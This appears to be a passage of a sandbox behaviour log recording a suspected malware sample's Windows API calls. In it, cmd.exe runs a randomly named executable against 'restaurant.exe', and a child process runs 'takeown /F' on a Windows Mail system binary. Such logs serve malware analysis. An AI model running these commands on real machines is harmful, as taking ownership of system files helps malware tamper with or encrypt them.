RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xc5e6a8, lpData=0xc5e6b0, lpcbData=0xc5e6ac*=0x1000 | out: lpType=0xc5e6a8*=0x0, lpData=0xc5e6b0*=0x9, lpcbData=0xc5e6ac*=0x1000) returned 0x2 [0297.285] RegCloseKey (hKey=0x94) returned 0x0 [0297.285] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb432b1 [0297.285] srand (_Seed=0x5bb432b1) [0297.285] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"restaurant.exe\" -nobanner" [0297.285] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"restaurant.exe\" -nobanner" [0297.285] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0297.286] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xde7f68, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0297.286] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0297.286] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0297.286] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0297.286] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0297.286] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0297.286] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0297.286] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0297.286] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0297.286] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0297.286] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0297.286] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0297.286] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0297.286] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0297.286] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xc5f47c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0297.286] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0xc5f47c, lpFilePart=0xc5f474 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xc5f474*="Desktop") returned 0x1d [0297.286] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0297.286] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xc5f1f8 | out: lpFindFileData=0xc5f1f8) returned 0xde8178 [0297.286] FindClose (in: hFindFile=0xde8178 | out: hFindFile=0xde8178) returned 1 [0297.286] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xc5f1f8 | out: lpFindFileData=0xc5f1f8) returned 0xde8178 [0297.286] FindClose (in: hFindFile=0xde8178 | out: hFindFile=0xde8178) returned 1 [0297.286] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0297.286] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xc5f1f8 | out: lpFindFileData=0xc5f1f8) returned 0xde8178 [0297.287] FindClose (in: hFindFile=0xde8178 | out: hFindFile=0xde8178) returned 1 [0297.287] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0297.287] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0297.287] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0297.287] GetEnvironmentStringsW () returned 0xdea0a8* [0297.287] FreeEnvironmentStringsA (penv="=") returned 1 [0297.287] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0297.288] GetConsoleOutputCP () returned 0x1b5 [0297.363] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0297.363] GetUserDefaultLCID () returned 0x409 [0297.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0297.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xc5f5ac, cchData=128 | out: lpLCData="0") returned 2 [0297.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xc5f5ac, cchData=128 | out: lpLCData="0") returned 2 [0297.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xc5f5ac, cchData=128 | out: lpLCData="1") returned 2 [0297.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0297.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0297.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0297.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0297.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0297.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0297.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0297.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0297.363] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0297.363] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0297.363] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0297.364] GetConsoleTitleW (in: lpConsoleTitle=0xde8d10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0297.372] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0297.372] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0297.372] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0297.372] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0297.373] _wcsicmp (_String1="vIDhS3md.exe", _String2=")") returned 77 [0297.373] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0297.373] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0297.373] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0297.373] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0297.373] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0297.373] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0297.374] GetConsoleTitleW (in: lpConsoleTitle=0xc5f298, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0297.375] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0297.375] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0297.376] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0297.377] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0297.377] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0297.377] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0297.377] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0297.377] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0297.377] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0297.377] SetErrorMode (uMode=0x0) returned 0x0 [0297.377] SetErrorMode (uMode=0x1) returned 0x0 [0297.378] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xdeb0b8, lpFilePart=0xc5eda4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xc5eda4*="Desktop") returned 0x1d [0297.378] SetErrorMode (uMode=0x0) returned 0x1 [0297.378] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0297.378] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0297.382] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0297.383] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0297.383] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0xc5eb50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc5eb50) returned 0xde9410 [0297.383] FindClose (in: hFindFile=0xde9410 | out: hFindFile=0xde9410) returned 1 [0297.383] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0297.383] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0297.383] GetConsoleTitleW (in: lpConsoleTitle=0xc5f024, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0297.383] InitializeProcThreadAttributeList (in: lpAttributeList=0xc5ef50, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc5ef34 | out: lpAttributeList=0xc5ef50, lpSize=0xc5ef34) returned 1 [0297.383] UpdateProcThreadAttribute (in: lpAttributeList=0xc5ef50, dwFlags=0x0, Attribute=0x60001, lpValue=0xc5ef3c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc5ef50, lpPreviousValue=0x0) returned 1 [0297.383] GetStartupInfoW (in: lpStartupInfo=0xc5ef88 | out: lpStartupInfo=0xc5ef88*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x38, hStdOutput=0xc0, hStdError=0x40)) [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"res", _MaxCount=0x7) returned -3 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0297.384] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0297.384] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0297.385] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula \"restaurant.exe\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xc5eed8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"restaurant.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc5ef24 | out: lpCommandLine="vIDhS3md.exe -accepteula \"restaurant.exe\" -nobanner", lpProcessInformation=0xc5ef24*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xcac, dwThreadId=0xcb0)) returned 1 [0297.392] CloseHandle (hObject=0xa4) returned 1 [0297.392] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0297.392] GetEnvironmentStringsW () returned 0xde8178* [0297.392] FreeEnvironmentStringsA (penv="=") returned 1 [0297.392] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0299.114] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xc5eebc | out: lpExitCode=0xc5eebc*=0x1) returned 1 [0299.115] CloseHandle (hObject=0xa8) returned 1 [0299.115] _vsnwprintf (in: _Buffer=0xc5efa4, _BufferCount=0x13, _Format="%08X", _ArgList=0xc5eec4 | out: _Buffer="00000001") returned 8 [0299.115] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0299.115] GetEnvironmentStringsW () returned 0xde8178* [0299.115] FreeEnvironmentStringsA (penv="=") returned 1 [0299.115] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0299.115] GetEnvironmentStringsW () returned 0xde8178* [0299.115] FreeEnvironmentStringsA (penv="=") returned 1 [0299.115] DeleteProcThreadAttributeList (in: lpAttributeList=0xc5ef50 | out: lpAttributeList=0xc5ef50) [0299.115] _get_osfhandle (_FileHandle=1) returned 0xc0 [0299.115] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0299.115] _get_osfhandle (_FileHandle=1) returned 0xc0 [0299.115] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0299.115] _get_osfhandle (_FileHandle=0) returned 0x38 [0299.115] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0299.289] SetConsoleInputExeNameW () returned 0x1 [0299.289] GetConsoleOutputCP () returned 0x1b5 [0299.289] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0299.289] SetThreadUILanguage (LangId=0x0) returned 0x409 [0299.289] exit (_Code=1) Thread: id = 1000 os_tid = 0xc88 Process: id = "145" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x5b97c000" os_pid = "0xc68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "126" os_parent_pid = "0x6e0" cmd_line = "takeown /F \"C:\\Program Files\\Windows Mail\\wabmig.exe\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9995 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\SysWOW64\\takeown.exe" (normalized: "c:\\windows\\syswow64\\takeown.exe") Region: id = 9996 start_va = 0xfe0000 end_va = 0x4fdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fe0000" filename = "" Region: id = 9997 start_va = 0x4fe0000 end_va = 0x4ffffff entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 9998 start_va = 0x5000000 end_va = 0x5001fff entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 9999 start_va = 0x5010000 end_va = 0x5023fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005010000" filename = "" Region: id = 10000 start_va = 0x5030000 end_va = 0x506ffff entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 10001 start_va = 0x5070000 end_va = 0x50affff entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 10002 start_va = 0x50b0000 end_va = 0x50b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050b0000" filename = "" Region: id = 10003 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10004 start_va = 0x7fdc0000 end_va = 0x7fde2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fdc0000" filename = "" Region: id = 10005 start_va = 0x7fde4000 end_va = 0x7fde4fff entry_point = 0x0 region_type = private name = "private_0x000000007fde4000" filename = "" Region: id = 10006 start_va = 0x7fdeb000 end_va = 0x7fdedfff entry_point = 0x0 region_type = 